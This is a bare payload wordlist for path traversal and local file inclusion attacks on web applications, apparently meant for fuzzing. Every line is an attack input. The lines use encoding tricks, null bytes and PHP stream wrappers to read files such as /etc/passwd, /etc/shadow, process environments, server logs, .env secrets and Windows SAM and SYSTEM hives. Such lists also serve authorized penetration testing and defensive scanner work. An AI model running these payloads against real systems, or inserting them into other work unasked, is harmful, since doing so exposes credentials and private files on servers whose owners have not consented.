../etc/passwd
../../etc/passwd
../../../etc/passwd
../../../../etc/passwd
../../../../../etc/passwd
../../../../../../etc/passwd
../../../../../../../etc/passwd
../../../../../../../../etc/passwd
../../../../../../../../../etc/passwd
../../../../../../../../../../etc/passwd
.././etc/passwd
../.././etc/passwd
../../.././etc/passwd
../../../.././etc/passwd
../../../../.././etc/passwd
.././../etc/passwd
../.././../etc/passwd
../../.././../etc/passwd
../../../.././../etc/passwd
../../../../.././../etc/passwd
..//etc/passwd
..//..//etc/passwd
..//..//..//etc/passwd
..//..//..//..//etc/passwd
..//..//..//..//..//etc/passwd
..//../etc/passwd
..//../..//etc/passwd
..//../..//../etc/passwd
..//../..//../..//etc/passwd
..//../..//../..//../etc/passwd
....//etc/passwd
....//....//etc/passwd
....//....//....//etc/passwd
....//....//....//....//etc/passwd
....//....//....//....//....//etc/passwd
..;/etc/passwd
..;/..;/etc/passwd
..;/..;/..;/etc/passwd
..;/..;/..;/..;/etc/passwd
..;/..;/..;/..;/..;/etc/passwd
..%2fetc%2fpasswd
..%2f..%2fetc%2fpasswd
..%2f..%2f..%2fetc%2fpasswd
..%2f..%2f..%2f..%2fetc%2fpasswd
..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
.%2e/etc/passwd
.%2e/.%2e/etc/passwd
.%2e/.%2e/.%2e/etc/passwd
.%2e/.%2e/.%2e/.%2e/etc/passwd
.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd
%2e%2e/etc/passwd
%2e%2e/%2e%2e/etc/passwd
%2e%2e/%2e%2e/%2e%2e/etc/passwd
%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
..%252fetc%252fpasswd
..%252f..%252fetc%252fpasswd
..%252f..%252f..%252fetc%252fpasswd
..%252f..%252f..%252f..%252fetc%252fpasswd
..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
%252e%252e/etc/passwd
%252e%252e/%252e%252e/etc/passwd
%252e%252e/%252e%252e/%252e%252e/etc/passwd
%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd
..%c0%afetc%c0%afpasswd
..%c0%af..%c0%afetc%c0%afpasswd
..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
..%c0%af..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
..%c1%9cetc%c1%9cpasswd
..%c1%9c..%c1%9cetc%c1%9cpasswd
..%c1%9c..%c1%9c..%c1%9cetc%c1%9cpasswd
..%c1%9c..%c1%9c..%c1%9c..%c1%9cetc%c1%9cpasswd
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9cetc%c1%9cpasswd
..%e0%80%afetc%e0%80%afpasswd
..%e0%80%af..%e0%80%afetc%e0%80%afpasswd
..%e0%80%af..%e0%80%af..%e0%80%afetc%e0%80%afpasswd
..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%afetc%e0%80%afpasswd
..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%afetc%e0%80%afpasswd
..%5cetc%5cpasswd
..%5c..%5cetc%5cpasswd
..%5c..%5c..%5cetc%5cpasswd
..%5c..%5c..%5c..%5cetc%5cpasswd
..%5c..%5c..%5c..%5c..%5cetc%5cpasswd
..\\etc\\passwd
..\\..\\etc\\passwd
..\\..\\..\\etc\\passwd
..\\..\\..\\..\\etc\\passwd
..\\..\\..\\..\\..\\etc\\passwd
..%2f.%2fetc%2fpasswd
..%2f.%2f..%2fetc%2fpasswd
..%2f.%2f..%2f.%2fetc%2fpasswd
..%2f.%2f..%2f.%2f..%2fetc%2fpasswd
..%2f.%2f..%2f.%2f..%2f.%2fetc%2fpasswd
../%00/etc/passwd
../../%00/etc/passwd
../../../%00/etc/passwd
../../../../%00/etc/passwd
../../../../../%00/etc/passwd
../../../../etc/passwd%00
../../../../etc/passwd%00.jpg
../../../../etc/passwd%00.php
../../../../etc/passwd%2500
../../../../etc/passwd%00%00
php://filter/read=convert.base64-encode/resource=../etc/passwd
php://filter/read=convert.base64-encode/resource=../../etc/passwd
php://filter/read=convert.base64-encode/resource=../../../etc/passwd
php://filter/read=convert.base64-encode/resource=../../../../etc/passwd
php://filter/read=convert.base64-encode/resource=../../../../../etc/passwd
php://filter/resource=../etc/passwd
php://filter/resource=../../etc/passwd
php://filter/resource=../../../etc/passwd
php://filter/resource=../../../../etc/passwd
php://filter/resource=../../../../../etc/passwd
php://filter/read=string.rot13/resource=../../../../etc/passwd
php://filter/read=convert.iconv.utf-8.utf-16/resource=../../../../etc/passwd
php://filter/read=convert.iconv.utf-16.utf-8/resource=../../../../etc/passwd
php://input
php://stdin
php://memory
php://temp
file:///etc/passwd
file://../etc/passwd
file://../../etc/passwd
file://../../../etc/passwd
file://../../../../etc/passwd
file://localhost/etc/passwd
file://127.0.0.1/etc/passwd
data://text/plain,../../../../etc/passwd
data://text/plain;base64,Ly4uLy4uLy4uLy4uL2V0Yy9wYXNzd2Q=
zip://shell.zip%23../etc/passwd
zip://shell.zip%23../../etc/passwd
zip://shell.zip%23../../../etc/passwd
zip://shell.zip%23../../../../etc/passwd
phar://archive.phar/../etc/passwd
phar://archive.phar/../../etc/passwd
phar://archive.phar/../../../etc/passwd
phar://archive.phar/../../../../etc/passwd
../../../../proc/self/environ
../../../../proc/self/cmdline
../../../../proc/self/status
../../../../proc/self/maps
../../../../proc/net/tcp
../../../../proc/net/udp
../../../../var/log/auth.log
../../../../var/log/syslog
../../../../var/log/messages
../../../../var/log/nginx/access.log
../../../../var/log/nginx/error.log
../../../../var/log/apache2/access.log
../../../../var/log/apache2/error.log
../../../../etc/hosts
../../../../etc/hostname
../../../../etc/issue
../../../../etc/group
../../../../etc/shadow
../../../../etc/mysql/my.cnf
../../../../etc/php.ini
../../../../etc/nginx/nginx.conf
../../../../etc/apache2/apache2.conf
C:\Windows\win.ini
..\..\Windows\win.ini
..\..\..\Windows\win.ini
..\..\..\..\Windows\win.ini
..%5c..%5cWindows%5cwin.ini
..%5c..%5c..%5cWindows%5cwin.ini
%2e%2e%5cWindows%5cwin.ini
%2e%2e%5c%2e%2e%5cWindows%5cwin.ini
\\?\C:\Windows\win.ini
../../../../../../etc/passwd
../../../../../../../etc/passwd
../../../../../../../../etc/passwd
../../../../../../../../../etc/passwd
../../../../../../../../../../etc/passwd
....//....//....//....//....//....//etc/passwd
..//..//..//..//..//..//etc/passwd
.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
..%25252fetc%25252fpasswd
..%25252f..%25252fetc%25252fpasswd
..%255c..%255cetc%255cpasswd
..%255c..%255c..%255cetc%255cpasswd
php://filter/read=convert.base64-encode/resource=../../../../../../etc/passwd
php://filter/read=convert.base64-encode/resource=../../../../../../../etc/passwd
file://../../../../../../etc/passwd
file://../../../../../../../etc/passwd
../../../../proc/1/cgroup
../../../../proc/version
../../../../proc/cpuinfo
../../../../etc/resolv.conf
../../../../var/www/.env
../../../../var/www/html/.env
../../../../.env
../../../../.env.local
../../../../storage/logs/laravel.log
../../../../bootstrap/cache/config.php
C:\Windows\System32\drivers\etc\hosts
C:\Windows\System32\config\SAM
C:\Windows\System32\config\SYSTEM
